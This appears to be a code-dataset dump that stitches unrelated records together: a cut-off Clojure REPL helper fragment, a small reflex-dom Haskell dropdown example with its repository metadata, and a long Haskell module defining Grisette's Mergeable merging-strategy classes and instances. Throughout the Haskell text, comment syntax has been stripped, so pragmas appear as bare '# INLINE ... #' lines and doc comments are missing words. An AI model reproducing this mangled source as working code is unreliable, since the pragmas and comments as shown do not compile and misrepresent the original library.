(safe-ns-resolve comp-env ns (symbol captured-env)))]
(when resolved
(replique.omniscient-runtime/get-locals @resolved))))
(defn captured-env-locals-cljs [comp-env repl-env ns captured-env]
(let [ns (or (and ns (env/find-ns comp-env (symbol ns)))
(env/find-ns comp-env (env/default-ns comp-env)))
resolved (when capture-env
(safe-ns-resolve comp-env ns (symbol captured-env)))]
(when (:name resolved)
(let [{:keys [status value]} (@cljs-evaluate-form
repl-env
(format "replique.omniscient_runtime.get_locals(%s);"
(@cljs-munged (str (:name resolved))))
:timeout-before-submitted 100)]
(when (= :success status)
(elisp/->ElispString value))))))
(comment
(def env (atom nil))
(let [eeee 44]
(replique.interactive/capture-env env
44))
(replique.interactive/with-env env
eeee)
)
|
ab669a50822af429548133bceea5aadef50ebaa34cca9e2aa224e777c33c2cc2 | hansroland/reflex-dom-inbits | dropdown01.hs | {-# LANGUAGE OverloadedStrings #-}
import Reflex.Dom
import qualified Data.Text as T
import qualified Data.Map as Map
import Data.Monoid((<>))
import Data.Maybe (fromJust)
main :: IO ()
main = mainWidget bodyElement
bodyElement :: MonadWidget t m => m ()
bodyElement = el "div" $ do
el "h2" $ text "Dropdown"
text "Select country "
dd <- dropdown 2 (constDyn countries) def
el "p" blank
let selItem = result <$> value dd
dynText selItem
countries :: Map.Map Int T.Text
countries = Map.fromList [(1, "France"), (2, "Switzerland"), (3, "Germany"), (4, "Italy"), (5, "USA")]
result :: Int -> T.Text
result key = "You selected: " <> fromJust (Map.lookup key countries) | null | https://raw.githubusercontent.com/hansroland/reflex-dom-inbits/3bf4ccf43aa45c5df7d3ce42dae38955f657ca33/src/dropdown01.hs | haskell | # LANGUAGE OverloadedStrings # | import Reflex.Dom
import qualified Data.Text as T
import qualified Data.Map as Map
import Data.Monoid((<>))
import Data.Maybe (fromJust)
main :: IO ()
main = mainWidget bodyElement
bodyElement :: MonadWidget t m => m ()
bodyElement = el "div" $ do
el "h2" $ text "Dropdown"
text "Select country "
dd <- dropdown 2 (constDyn countries) def
el "p" blank
let selItem = result <$> value dd
dynText selItem
countries :: Map.Map Int T.Text
countries = Map.fromList [(1, "France"), (2, "Switzerland"), (3, "Germany"), (4, "Italy"), (5, "USA")]
result :: Int -> T.Text
result key = "You selected: " <> fromJust (Map.lookup key countries) |
ba92d62d5208944c0b3ddb43c9b6604a4200a831a0afc0bbb2f184d1553eb9cd | lsrcz/grisette | Mergeable.hs | # LANGUAGE CPP #
# LANGUAGE DataKinds #
# LANGUAGE DerivingVia #
# LANGUAGE FlexibleContexts #
# LANGUAGE FlexibleInstances #
{-# LANGUAGE GADTs #-}
# LANGUAGE KindSignatures #
# LANGUAGE LambdaCase #
# LANGUAGE MultiParamTypeClasses #
# LANGUAGE QuantifiedConstraints #
{-# LANGUAGE RankNTypes #-}
# LANGUAGE ScopedTypeVariables #
# LANGUAGE StandaloneDeriving #
# LANGUAGE Trustworthy #
# LANGUAGE TypeApplications #
# LANGUAGE TypeOperators #
# LANGUAGE UndecidableInstances #
-- |
Module : . Core . Data . Class .
Copyright : ( c ) 2021 - 2023
-- License : BSD-3-Clause (see the LICENSE file)
--
-- Maintainer :
-- Stability : Experimental
Portability : GHC only
module Grisette.Core.Data.Class.Mergeable
( -- * Merging strategy
MergingStrategy (..),
*
Mergeable (..),
Mergeable1 (..),
rootStrategy1,
Mergeable2 (..),
rootStrategy2,
Mergeable3 (..),
rootStrategy3,
Mergeable' (..),
derivedRootStrategy,
-- * Combinators for manually building merging strategies
wrapStrategy,
product2Strategy,
DynamicSortedIdx (..),
StrategyList (..),
buildStrategyList,
resolveStrategy,
resolveStrategy',
)
where
import Control.Exception
import Control.Monad.Cont
import Control.Monad.Except
import Control.Monad.Identity
import qualified Control.Monad.RWS.Lazy as RWSLazy
import qualified Control.Monad.RWS.Strict as RWSStrict
import Control.Monad.Reader
import qualified Control.Monad.State.Lazy as StateLazy
import qualified Control.Monad.State.Strict as StateStrict
import Control.Monad.Trans.Maybe
import qualified Control.Monad.Writer.Lazy as WriterLazy
import qualified Control.Monad.Writer.Strict as WriterStrict
import qualified Data.ByteString as B
import Data.Functor.Classes
import Data.Functor.Sum
import Data.Int
import Data.Kind
import qualified Data.Monoid as Monoid
import Data.Typeable
import Data.Word
import GHC.Natural
import qualified GHC.TypeLits
import GHC.TypeNats
import Generics.Deriving
import Grisette.Core.Data.BV
import Grisette.Core.Data.Class.Bool
import Grisette.IR.SymPrim.Data.Prim.InternedTerm.Term
import {-# SOURCE #-} Grisette.IR.SymPrim.Data.SymPrim
import Unsafe.Coerce
-- | Helper type for combining arbitrary number of indices into one.
-- Useful when trying to write efficient merge strategy for lists/vectors.
data DynamicSortedIdx where
DynamicSortedIdx :: forall idx. (Show idx, Ord idx, Typeable idx) => idx -> DynamicSortedIdx
instance Eq DynamicSortedIdx where
(DynamicSortedIdx (a :: a)) == (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> a == b
_ -> False
# INLINE (= =) #
instance Ord DynamicSortedIdx where
compare (DynamicSortedIdx (a :: a)) (DynamicSortedIdx (b :: b)) = case eqT @a @b of
Just Refl -> compare a b
_ -> error "This Ord is incomplete"
# INLINE compare #
instance Show DynamicSortedIdx where
show (DynamicSortedIdx a) = show a
| Resolves the indices and the terminal merge strategy for a value of some ' ' type .
resolveStrategy :: forall x. MergingStrategy x -> x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy s x = resolveStrategy' x s
{-# INLINE resolveStrategy #-}
-- | Resolves the indices and the terminal merge strategy for a value given a merge strategy for its type.
resolveStrategy' :: forall x. x -> MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
resolveStrategy' x = go
where
go :: MergingStrategy x -> ([DynamicSortedIdx], MergingStrategy x)
go (SortedStrategy idxFun subStrategy) = case go ss of
(idxs, r) -> (DynamicSortedIdx idx : idxs, r)
where
idx = idxFun x
ss = subStrategy idx
go s = ([], s)
{-# INLINE resolveStrategy' #-}
-- | Merging strategies.
--
-- __You probably do not need to know the details of this type if you are only going__
-- __to use algebraic data types. You can get merging strategies for them with type__
-- __derivation.__
--
In , a merged union ( if - then - else tree ) follows the _ _ /hierarchical/ _ _
-- __/sorted representation invariant/__ with regards to some merging strategy.
--
-- A merging strategy encodes how to merge a __/subset/__ of the values of a
given type . We have three types of merging strategies :
--
-- * Simple strategy
-- * Sorted strategy
-- * No strategy
--
The ' SimpleStrategy ' merges values with a simple merge function .
-- For example,
--
-- * the symbolic boolean values can be directly merged with 'ites'.
--
-- * the set @{1}@, which is a subset of the values of the type @Integer@,
-- can be simply merged as the set contains only a single value.
--
-- * all the 'Just' values of the type @Maybe SymBool@ can be simply merged
-- by merging the wrapped symbolic boolean with 'ites'.
--
The ' SortedStrategy ' merges values by first grouping the values with an
-- indexing function, and the values with the same index will be organized as
a sub - tree in the if - then - else structure of ' . Core . Data . UnionBase . UnionBase ' .
-- Each group (sub-tree) will be further merged with a sub-strategy for the
-- index.
The index type should be a totally ordered type ( with the ' '
type class ) . will use the indexing function to partition the values
-- into sub-trees, and organize them in a sorted way. The sub-trees will further
-- be merged with the sub-strategies. For example,
--
* all the integers can be merged with ' SortedStrategy ' by indexing with
the identity function and use the ' SimpleStrategy ' shown before as the
-- sub-strategies.
--
* all the @Maybe SymBool@ values can be merged with ' SortedStrategy ' by
-- indexing with 'Data.Maybe.isJust', the 'Nothing' and 'Just' values can then
-- then be merged with different simple strategies as sub-strategies.
--
The ' ' does not perform any merging .
-- For example, we cannot merge values with function types that returns concrete
-- lists.
--
For , we can automatically derive the ' ' type class , which
-- provides a merging strategy.
--
-- If the derived version does not work for you, you should determine
-- if your type can be directly merged with a merging function. If so, you can
implement the merging strategy as a ' SimpleStrategy ' .
-- If the type cannot be directly merged with a merging function, but could be
-- partitioned into subsets of values that can be simply merged with a function,
you should implement the merging strategy as a ' SortedStrategy ' .
-- For easier building of the merging strategies, check out the combinators
like ` wrapStrategy ` .
--
-- For more details, please see the documents of the constructors, or refer to
[ 's paper]( / files / POPL23.pdf ) .
data MergingStrategy a where
-- | Simple mergeable strategy.
--
-- For symbolic booleans, we can implement its merge strategy as follows:
--
> SimpleStrategy ites : : MergingStrategy SymBool
SimpleStrategy ::
-- | Merge function.
(SymBool -> a -> a -> a) ->
MergingStrategy a
-- | Sorted mergeable strategy.
--
For Integers , we can implement its merge strategy as follows :
--
> SortedStrategy i d ( \ _ - > SimpleStrategy $ \ _ t _ - > t )
--
-- For @Maybe SymBool@, we can implement its merge strategy as follows:
--
> SortedStrategy
-- > (\case; Nothing -> False; Just _ -> True)
-- > (\idx ->
> if idx
-- > then SimpleStrategy $ \_ t _ -> t
-- > else SimpleStrategy $ \cond (Just l) (Just r) -> Just $ ites cond l r)
SortedStrategy ::
(Ord idx, Typeable idx, Show idx) =>
-- | Indexing function
(a -> idx) ->
-- | Sub-strategy function
(idx -> MergingStrategy a) ->
MergingStrategy a
-- | For preventing the merging intentionally. This could be
-- useful for keeping some value concrete and may help generate more efficient
-- formulas.
--
See [ 's paper]( / files / POPL23.pdf ) for
-- details.
NoStrategy :: MergingStrategy a
-- | Useful utility function for building merge strategies manually.
--
-- For example, to build the merge strategy for the just branch of @Maybe a@,
-- one could write
--
> wrapStrategy Just fromMaybe rootStrategy : : MergingStrategy ( Maybe a )
wrapStrategy ::
-- | The merge strategy to be wrapped
MergingStrategy a ->
-- | The wrap function
(a -> b) ->
-- | The unwrap function, which does not have to be defined for every value
(b -> a) ->
MergingStrategy b
wrapStrategy (SimpleStrategy m) wrap unwrap =
SimpleStrategy
( \cond ifTrue ifFalse ->
wrap $ m cond (unwrap ifTrue) (unwrap ifFalse)
)
wrapStrategy (SortedStrategy idxFun substrategy) wrap unwrap =
SortedStrategy
(idxFun . unwrap)
(\idx -> wrapStrategy (substrategy idx) wrap unwrap)
wrapStrategy NoStrategy _ _ = NoStrategy
# INLINE wrapStrategy #
| Each type is associated with a root merge strategy given by ' rootStrategy ' .
-- The root merge strategy should be able to merge every value of the type.
will use the root merge strategy to merge the values of the type in
-- a union.
--
_ _ Note 1 : _ _ This type class can be derived for algebraic data types .
You may need the @DerivingVia@ and @DerivingStrategies@ extensions .
--
> data X = ... deriving Generic deriving via ( Default X )
class Mergeable a where
-- | The root merging strategy for the type.
rootStrategy :: MergingStrategy a
instance (Generic a, Mergeable' (Rep a)) => Mergeable (Default a) where
rootStrategy = unsafeCoerce (derivedRootStrategy :: MergingStrategy a)
# NOINLINE rootStrategy #
| Generic derivation for the ' ' class .
--
Usually you can derive the merging strategy with the @DerivingVia@ and
-- @DerivingStrategies@ extension.
--
> data X = ... deriving ( Generic ) deriving via ( Default X )
derivedRootStrategy :: (Generic a, Mergeable' (Rep a)) => MergingStrategy a
derivedRootStrategy = wrapStrategy rootStrategy' to from
# INLINE derivedRootStrategy #
| Lifting of the ' ' class to unary type constructors .
class Mergeable1 (u :: Type -> Type) where
-- | Lift merge strategy through the type constructor.
liftRootStrategy :: MergingStrategy a -> MergingStrategy (u a)
-- | Lift the root merge strategy through the unary type constructor.
rootStrategy1 :: (Mergeable a, Mergeable1 u) => MergingStrategy (u a)
rootStrategy1 = liftRootStrategy rootStrategy
# INLINE rootStrategy1 #
| Lifting of the ' ' class to binary type constructors .
class Mergeable2 (u :: Type -> Type -> Type) where
-- | Lift merge strategy through the type constructor.
liftRootStrategy2 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy (u a b)
-- | Lift the root merge strategy through the binary type constructor.
rootStrategy2 :: (Mergeable a, Mergeable b, Mergeable2 u) => MergingStrategy (u a b)
rootStrategy2 = liftRootStrategy2 rootStrategy rootStrategy
# INLINE rootStrategy2 #
| Lifting of the ' ' class to ternary type constructors .
class Mergeable3 (u :: Type -> Type -> Type -> Type) where
-- | Lift merge strategy through the type constructor.
liftRootStrategy3 :: MergingStrategy a -> MergingStrategy b -> MergingStrategy c -> MergingStrategy (u a b c)
-- | Lift the root merge strategy through the binary type constructor.
rootStrategy3 :: (Mergeable a, Mergeable b, Mergeable c, Mergeable3 u) => MergingStrategy (u a b c)
rootStrategy3 = liftRootStrategy3 rootStrategy rootStrategy rootStrategy
# INLINE rootStrategy3 #
instance (Generic1 u, Mergeable1' (Rep1 u)) => Mergeable1 (Default1 u) where
liftRootStrategy = unsafeCoerce (derivedLiftMergingStrategy :: MergingStrategy a -> MergingStrategy (u a))
# NOINLINE liftRootStrategy #
class Mergeable1' (u :: Type -> Type) where
liftRootStrategy' :: MergingStrategy a -> MergingStrategy (u a)
instance Mergeable1' U1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
{-# INLINE liftRootStrategy' #-}
instance Mergeable1' V1 where
liftRootStrategy' _ = SimpleStrategy (\_ t _ -> t)
{-# INLINE liftRootStrategy' #-}
instance Mergeable1' Par1 where
liftRootStrategy' m = wrapStrategy m Par1 unPar1
{-# INLINE liftRootStrategy' #-}
instance Mergeable1 f => Mergeable1' (Rec1 f) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy m) Rec1 unRec1
{-# INLINE liftRootStrategy' #-}
instance Mergeable c => Mergeable1' (K1 i c) where
liftRootStrategy' _ = wrapStrategy rootStrategy K1 unK1
{-# INLINE liftRootStrategy' #-}
instance Mergeable1' a => Mergeable1' (M1 i c a) where
liftRootStrategy' m = wrapStrategy (liftRootStrategy' m) M1 unM1
{-# INLINE liftRootStrategy' #-}
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :+: b) where
liftRootStrategy' m =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy (liftRootStrategy' m) L1 (\case (L1 v) -> v; _ -> error "impossible")
else wrapStrategy (liftRootStrategy' m) R1 (\case (R1 v) -> v; _ -> error "impossible")
)
{-# INLINE liftRootStrategy' #-}
instance (Mergeable1' a, Mergeable1' b) => Mergeable1' (a :*: b) where
liftRootStrategy' m = product2Strategy (:*:) (\(a :*: b) -> (a, b)) (liftRootStrategy' m) (liftRootStrategy' m)
{-# INLINE liftRootStrategy' #-}
| Generic derivation for the ' ' class .
derivedLiftMergingStrategy :: (Generic1 u, Mergeable1' (Rep1 u)) => MergingStrategy a -> MergingStrategy (u a)
derivedLiftMergingStrategy m = wrapStrategy (liftRootStrategy' m) to1 from1
# INLINE derivedLiftMergingStrategy #
| Auxiliary class for the generic derivation for the ' ' class .
class Mergeable' f where
rootStrategy' :: MergingStrategy (f a)
instance Mergeable' U1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance Mergeable' V1 where
rootStrategy' = SimpleStrategy (\_ t _ -> t)
# INLINE rootStrategy ' #
instance (Mergeable c) => Mergeable' (K1 i c) where
rootStrategy' = wrapStrategy rootStrategy K1 unK1
# INLINE rootStrategy ' #
instance (Mergeable' a) => Mergeable' (M1 i c a) where
rootStrategy' = wrapStrategy rootStrategy' M1 unM1
# INLINE rootStrategy ' #
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :+: b) where
rootStrategy' =
SortedStrategy
( \case
L1 _ -> False
R1 _ -> True
)
( \idx ->
if not idx
then wrapStrategy rootStrategy' L1 (\case (L1 v) -> v; _ -> undefined)
else wrapStrategy rootStrategy' R1 (\case (R1 v) -> v; _ -> undefined)
)
# INLINE rootStrategy ' #
-- | Useful utility function for building merge strategies for product types
-- manually.
--
-- For example, to build the merge strategy for the following product type,
-- one could write
--
> data X = X { x1 : : Int , x2 : : }
> product2Strategy X ( \(X a b ) - > ( a , b ) ) rootStrategy rootStrategy
-- > :: MergingStrategy X
product2Strategy ::
-- | The wrap function
(a -> b -> r) ->
-- | The unwrap function, which does not have to be defined for every value
(r -> (a, b)) ->
| The first merge strategy to be wrapped
MergingStrategy a ->
| The second merge strategy to be wrapped
MergingStrategy b ->
MergingStrategy r
product2Strategy wrap unwrap strategy1 strategy2 =
case (strategy1, strategy2) of
(NoStrategy, _) -> NoStrategy
(_, NoStrategy) -> NoStrategy
(SimpleStrategy m1, SimpleStrategy m2) ->
SimpleStrategy $ \cond t f -> case (unwrap t, unwrap f) of
((hdt, tlt), (hdf, tlf)) ->
wrap (m1 cond hdt hdf) (m2 cond tlt tlf)
(s1@(SimpleStrategy _), SortedStrategy idxf subf) ->
SortedStrategy (idxf . snd . unwrap) (product2Strategy wrap unwrap s1 . subf)
(SortedStrategy idxf subf, s2) ->
SortedStrategy (idxf . fst . unwrap) (\idx -> product2Strategy wrap unwrap (subf idx) s2)
{-# INLINE product2Strategy #-}
instance (Mergeable' a, Mergeable' b) => Mergeable' (a :*: b) where
rootStrategy' = product2Strategy (:*:) (\(a :*: b) -> (a, b)) rootStrategy' rootStrategy'
# INLINE rootStrategy ' #
-- instances
#define CONCRETE_ORD_MERGEABLE(type) \
instance Mergeable type where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#define CONCRETE_ORD_MERGEABLE_BV(type) \
instance (KnownNat n, 1 <= n) => Mergeable (type n) where \
rootStrategy = \
let sub = SimpleStrategy $ \_ t _ -> t \
in SortedStrategy id $ const sub
#if 1
CONCRETE_ORD_MERGEABLE(Bool)
CONCRETE_ORD_MERGEABLE(Integer)
CONCRETE_ORD_MERGEABLE(Char)
CONCRETE_ORD_MERGEABLE(Int)
CONCRETE_ORD_MERGEABLE(Int8)
CONCRETE_ORD_MERGEABLE(Int16)
CONCRETE_ORD_MERGEABLE(Int32)
CONCRETE_ORD_MERGEABLE(Int64)
CONCRETE_ORD_MERGEABLE(Word)
CONCRETE_ORD_MERGEABLE(Word8)
CONCRETE_ORD_MERGEABLE(Word16)
CONCRETE_ORD_MERGEABLE(Word32)
CONCRETE_ORD_MERGEABLE(Word64)
CONCRETE_ORD_MERGEABLE(B.ByteString)
CONCRETE_ORD_MERGEABLE_BV(WordN)
CONCRETE_ORD_MERGEABLE_BV(IntN)
#endif
instance Mergeable SomeIntN where
rootStrategy =
SortedStrategy @Natural
(\(SomeIntN (v :: IntN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeIntN (IntN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
instance Mergeable SomeWordN where
rootStrategy =
SortedStrategy @Natural
(\(SomeWordN (v :: WordN n)) -> natVal (Proxy @n))
( \n ->
SortedStrategy @Integer
(\(SomeWordN (WordN i)) -> toInteger i)
(const $ SimpleStrategy $ \_ l _ -> l)
)
-- ()
deriving via (Default ()) instance Mergeable ()
-- Either
deriving via (Default (Either e a)) instance (Mergeable e, Mergeable a) => Mergeable (Either e a)
deriving via (Default1 (Either e)) instance (Mergeable e) => Mergeable1 (Either e)
instance Mergeable2 Either where
liftRootStrategy2 m1 m2 =
SortedStrategy
( \case
Left _ -> False
Right _ -> True
)
( \case
False -> wrapStrategy m1 Left (\case (Left v) -> v; _ -> undefined)
True -> wrapStrategy m2 Right (\case (Right v) -> v; _ -> undefined)
)
# INLINE liftRootStrategy2 #
-- Maybe
deriving via (Default (Maybe a)) instance (Mergeable a) => Mergeable (Maybe a)
deriving via (Default1 Maybe) instance Mergeable1 Maybe
-- | Helper type for building efficient merge strategy for list-like containers.
data StrategyList container where
StrategyList ::
forall bool a container.
container [DynamicSortedIdx] ->
container (MergingStrategy a) ->
StrategyList container
-- | Helper function for building efficient merge strategy for list-like containers.
buildStrategyList ::
forall bool a container.
(Functor container) =>
MergingStrategy a ->
container a ->
StrategyList container
buildStrategyList s l = StrategyList idxs strategies
where
r = resolveStrategy s <$> l
idxs = fst <$> r
strategies = snd <$> r
# INLINE buildStrategyList #
instance Eq1 container => Eq (StrategyList container) where
(StrategyList idxs1 _) == (StrategyList idxs2 _) = eq1 idxs1 idxs2
# INLINE (= =) #
instance Ord1 container => Ord (StrategyList container) where
compare (StrategyList idxs1 _) (StrategyList idxs2 _) = compare1 idxs1 idxs2
# INLINE compare #
instance Show1 container => Show (StrategyList container) where
showsPrec i (StrategyList idxs1 _) = showsPrec1 i idxs1
-- List
instance (Mergeable a) => Mergeable [a] where
rootStrategy = case rootStrategy :: MergingStrategy a of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList rootStrategy) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE rootStrategy #
instance Mergeable1 [] where
liftRootStrategy (ms :: MergingStrategy a) = case ms of
SimpleStrategy m ->
SortedStrategy length $ \_ ->
SimpleStrategy $ \cond -> zipWith (m cond)
NoStrategy ->
SortedStrategy length $ const NoStrategy
_ -> SortedStrategy length $ \_ ->
SortedStrategy (buildStrategyList ms) $ \(StrategyList _ strategies) ->
let s :: [MergingStrategy a] = unsafeCoerce strategies
allSimple = all (\case SimpleStrategy _ -> True; _ -> False) s
in if allSimple
then SimpleStrategy $ \cond l r ->
(\case (SimpleStrategy f, l1, r1) -> f cond l1 r1; _ -> error "impossible") <$> zip3 s l r
else NoStrategy
# INLINE liftRootStrategy #
-- (,)
deriving via (Default (a, b)) instance (Mergeable a, Mergeable b) => Mergeable (a, b)
deriving via (Default1 ((,) a)) instance (Mergeable a) => Mergeable1 ((,) a)
instance Mergeable2 (,) where
liftRootStrategy2 = product2Strategy (,) id
# INLINE liftRootStrategy2 #
-- (,,)
deriving via
(Default (a, b, c))
instance
(Mergeable a, Mergeable b, Mergeable c) => Mergeable (a, b, c)
deriving via
(Default1 ((,,) a b))
instance
(Mergeable a, Mergeable b) => Mergeable1 ((,,) a b)
instance (Mergeable a) => Mergeable2 ((,,) a) where
liftRootStrategy2 = liftRootStrategy3 rootStrategy
# INLINE liftRootStrategy2 #
instance Mergeable3 (,,) where
liftRootStrategy3 m1 m2 m3 =
product2Strategy
(\a (b, c) -> (a, b, c))
(\(a, b, c) -> (a, (b, c)))
m1
(liftRootStrategy2 m2 m3)
# INLINE liftRootStrategy3 #
-- (,,,)
deriving via
(Default (a, b, c, d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable (a, b, c, d)
deriving via
(Default1 ((,,,) a b c))
instance
(Mergeable a, Mergeable b, Mergeable c) =>
Mergeable1 ((,,,) a b c)
-- (,,,,)
deriving via
(Default (a, b, c, d, e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable (a, b, c, d, e)
deriving via
(Default1 ((,,,,) a b c d))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d) =>
Mergeable1 ((,,,,) a b c d)
-- (,,,,,)
deriving via
(Default (a, b, c, d, e, f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable (a, b, c, d, e, f)
deriving via
(Default1 ((,,,,,) a b c d e))
instance
(Mergeable a, Mergeable b, Mergeable c, Mergeable d, Mergeable e) =>
Mergeable1 ((,,,,,) a b c d e)
-- (,,,,,,)
deriving via
(Default (a, b, c, d, e, f, g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable (a, b, c, d, e, f, g)
deriving via
(Default1 ((,,,,,,) a b c d e f))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f
) =>
Mergeable1 ((,,,,,,) a b c d e f)
-- (,,,,,,,)
deriving via
(Default (a, b, c, d, e, f, g, h))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g,
Mergeable h
) =>
Mergeable (a, b, c, d, e, f, g, h)
deriving via
(Default1 ((,,,,,,,) a b c d e f g))
instance
( Mergeable a,
Mergeable b,
Mergeable c,
Mergeable d,
Mergeable e,
Mergeable f,
Mergeable g
) =>
Mergeable1 ((,,,,,,,) a b c d e f g)
-- function
instance (Mergeable b) => Mergeable (a -> b) where
rootStrategy = case rootStrategy @b of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE rootStrategy #
instance Mergeable1 ((->) a) where
liftRootStrategy ms = case ms of
SimpleStrategy m -> SimpleStrategy $ \cond t f v -> m cond (t v) (f v)
_ -> NoStrategy
# INLINE liftRootStrategy #
-- MaybeT
instance (Mergeable1 m, Mergeable a) => Mergeable (MaybeT m a) where
rootStrategy = wrapStrategy rootStrategy1 MaybeT runMaybeT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (MaybeT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) MaybeT runMaybeT
# INLINE liftRootStrategy #
-- ExceptT
instance
(Mergeable1 m, Mergeable e, Mergeable a) =>
Mergeable (ExceptT e m a)
where
rootStrategy = wrapStrategy rootStrategy1 ExceptT runExceptT
# INLINE rootStrategy #
instance (Mergeable1 m, Mergeable e) => Mergeable1 (ExceptT e m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy (liftRootStrategy m)) ExceptT runExceptT
# INLINE liftRootStrategy #
-- state
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateLazy.StateT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) StateLazy.StateT StateLazy.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateLazy.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateLazy.StateT
StateLazy.runStateT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (StateStrict.StateT s m a)
where
rootStrategy =
wrapStrategy (liftRootStrategy rootStrategy1) StateStrict.StateT StateStrict.runStateT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (StateStrict.StateT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy (liftRootStrategy2 m rootStrategy)))
StateStrict.StateT
StateStrict.runStateT
# INLINE liftRootStrategy #
-- writer
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterLazy.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterLazy.WriterT WriterLazy.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterLazy.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterLazy.WriterT
WriterLazy.runWriterT
# INLINE liftRootStrategy #
instance
(Mergeable s, Mergeable a, Mergeable1 m) =>
Mergeable (WriterStrict.WriterT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) WriterStrict.WriterT WriterStrict.runWriterT
# INLINE rootStrategy #
instance (Mergeable s, Mergeable1 m) => Mergeable1 (WriterStrict.WriterT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy2 m rootStrategy))
WriterStrict.WriterT
WriterStrict.runWriterT
# INLINE liftRootStrategy #
-- reader
instance
(Mergeable a, Mergeable1 m) =>
Mergeable (ReaderT s m a)
where
rootStrategy = wrapStrategy (liftRootStrategy rootStrategy1) ReaderT runReaderT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (ReaderT s m) where
liftRootStrategy m =
wrapStrategy
(liftRootStrategy (liftRootStrategy m))
ReaderT
runReaderT
# INLINE liftRootStrategy #
-- Sum
instance
(Mergeable1 l, Mergeable1 r, Mergeable x) =>
Mergeable (Sum l r x)
where
rootStrategy =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy rootStrategy1 InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy rootStrategy1 InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE rootStrategy #
instance (Mergeable1 l, Mergeable1 r) => Mergeable1 (Sum l r) where
liftRootStrategy m =
SortedStrategy
( \case
InL _ -> False
InR _ -> True
)
( \case
False -> wrapStrategy (liftRootStrategy m) InL (\case (InL v) -> v; _ -> error "impossible")
True -> wrapStrategy (liftRootStrategy m) InR (\case (InR v) -> v; _ -> error "impossible")
)
# INLINE liftRootStrategy #
-- Ordering
deriving via
(Default Ordering)
instance
Mergeable Ordering
Generic
deriving via
(Default (U1 x))
instance
Mergeable (U1 x)
deriving via
(Default (V1 x))
instance
Mergeable (V1 x)
deriving via
(Default (K1 i c x))
instance
(Mergeable c) => Mergeable (K1 i c x)
deriving via
(Default (M1 i c a x))
instance
(Mergeable (a x)) => Mergeable (M1 i c a x)
deriving via
(Default ((a :+: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :+: b) x)
deriving via
(Default ((a :*: b) x))
instance
(Mergeable (a x), Mergeable (b x)) => Mergeable ((a :*: b) x)
-- Identity
instance (Mergeable a) => Mergeable (Identity a) where
rootStrategy = wrapStrategy rootStrategy Identity runIdentity
# INLINE rootStrategy #
instance Mergeable1 Identity where
liftRootStrategy m = wrapStrategy m Identity runIdentity
# INLINE liftRootStrategy #
-- IdentityT
instance (Mergeable1 m, Mergeable a) => Mergeable (IdentityT m a) where
rootStrategy = wrapStrategy rootStrategy1 IdentityT runIdentityT
# INLINE rootStrategy #
instance (Mergeable1 m) => Mergeable1 (IdentityT m) where
liftRootStrategy m = wrapStrategy (liftRootStrategy m) IdentityT runIdentityT
